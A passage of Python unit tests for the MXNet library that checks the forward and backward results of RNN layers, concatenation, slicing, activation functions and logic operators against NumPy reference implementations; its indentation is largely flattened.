def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
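# A small illustrative check of np_softmax above (a sketch, not part of the original tests):
# every row of the output should sum to 1, and lowering the temperature sharpens the distribution.
def _np_softmax_example():
    logits = np.array([[1.0, 2.0, 3.0]])
    p_default = np_softmax(logits)                   # temperature = 1.0
    p_sharp = np_softmax(logits, temperature=0.5)    # lower temperature -> peakier distribution
    assert_allclose(p_default.sum(axis=-1), [1.0], rtol=1e-6)
    assert p_sharp[0, 2] > p_default[0, 2]
    return p_default, p_sharp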
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# If skip_second is True, the second argument will not have a gradient.
# This is to test #1130.
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
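# A sketch (illustrative only, not part of the original tests) of the same pass-through operator
# written with the newer mx.operator.CustomOp API instead of the legacy NumpyOp used above;
# the registered name 'identity_py' is arbitrary.
class _IdentityOp(mx.operator.CustomOp):
    def forward(self, is_train, req, in_data, out_data, aux):
        # copy the input straight through to the output
        self.assign(out_data[0], req[0], in_data[0])
    def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
        # identity: the gradient passes through unchanged
        self.assign(in_grad[0], req[0], out_grad[0])

@mx.operator.register('identity_py')
class _IdentityOpProp(mx.operator.CustomOpProp):
    def __init__(self):
        super(_IdentityOpProp, self).__init__(need_top_grad=True)
    def list_arguments(self):
        return ['data']
    def list_outputs(self):
        return ['output']
    def infer_shape(self, in_shape):
        return in_shape, [in_shape[0]], []
    def create_operator(self, ctx, shapes, dtypes):
        return _IdentityOp()
# Example usage: mx.nd.Custom(mx.nd.ones((10,)), op_type='identity_py')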
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
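# The constants in test_selu above are the standard SELU parameters (lambda ~= 1.0507,
# alpha ~= 1.6732), i.e. SELU(x) = lambda * x for x > 0 and lambda * alpha * (exp(x) - 1) otherwise,
# matching the fselu/fselu_grad reference implementations.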
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
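# The helpers in test_gelu above implement the tanh approximation
#   GELU(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x**3))),
# which is what the constants CUBE_CONSTANT and ROOT_TWO_OVER_PI encode.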
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y._bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z._simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar._simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar._simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y._simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed._simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
